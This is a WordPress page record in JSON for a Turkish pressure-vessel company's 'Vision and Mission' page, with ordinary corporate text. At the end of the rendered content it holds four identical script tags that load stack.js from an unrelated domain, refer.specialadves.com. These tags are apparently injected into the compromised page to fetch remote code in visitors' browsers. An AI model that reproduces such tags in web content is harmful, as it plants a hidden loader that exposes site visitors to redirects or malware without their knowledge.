{"id":728,"date":"2021-04-12T16:57:34","date_gmt":"2021-04-12T13:57:34","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hakkimizda-copy\/"},"modified":"2021-04-13T14:35:52","modified_gmt":"2021-04-13T11:35:52","slug":"vizyon-ve-misyon","status":"publish","type":"page","link":"https:\/\/gensalimited.com.tr\/index.php\/vizyon-ve-misyon\/","title":{"rendered":"Vizyon ve Misyon"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;730&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;]<h2   style=\"font-size: 43px; font-weight: 700; letter-spacing: -1px; line-height: 47px; text-align: left; color: #000000;\" class=\"\">Vizyon<\/h2><h2   style=\"font-size: 17px; font-weight: 400; letter-spacing: -0.5px; line-height: 32px; text-align: left; color: #444444;\" class=\" vc_custom_1618235957314\">Gensa olarak \u00f6nceli\u011fimiz sat\u0131\u015f \u00f6ncesi ve sonras\u0131 teknik deste\u011fimiz ile m\u00fc\u015fterilerimizi memnun etmektir. Bas\u0131n\u00e7l\u0131 kap sekt\u00f6r\u00fcnde kalite d\u00fczeyini en \u00fcst d\u00fczeye \u00e7\u0131karmak i\u00e7in yeniliklerimiz \u00fcst\u00fcnde durmadan \u00e7al\u0131\u015fmaktay\u0131z.<\/h2><h2   style=\"font-size: 43px; font-weight: 700; letter-spacing: -1px; line-height: 47px; text-align: left; color: #000000;\" class=\"\">Misyon<\/h2><h2   style=\"font-size: 17px; font-weight: 400; letter-spacing: -0.5px; line-height: 32px; text-align: left; color: #444444;\" class=\" vc_custom_1618236233089\">\u00dcr\u00fcnlerimiz, \u00e7\u00f6z\u00fcmlerimiz, sat\u0131\u015f sonras\u0131 hizmetlerimizle sa\u011flad\u0131\u011f\u0131m\u0131z g\u00fcvenilirlik ve y\u00fcksek i\u015f ahlak\u0131m\u0131z ile m\u00fc\u015fterilerin ilk tercihi olarak ve referanslar\u0131m\u0131z i\u00e7in de\u011fer yaratan bir \u015firket olmak.<\/h2>[\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;730&#8243; img_size=&#8221;full&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][\/vc_column][\/vc_row]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-728","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=728"}],"version-history":[{"count":4,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/728\/revisions"}],"predecessor-version":[{"id":876,"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/728\/revisions\/876"}],"wp:attachment":[{"href":"https:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}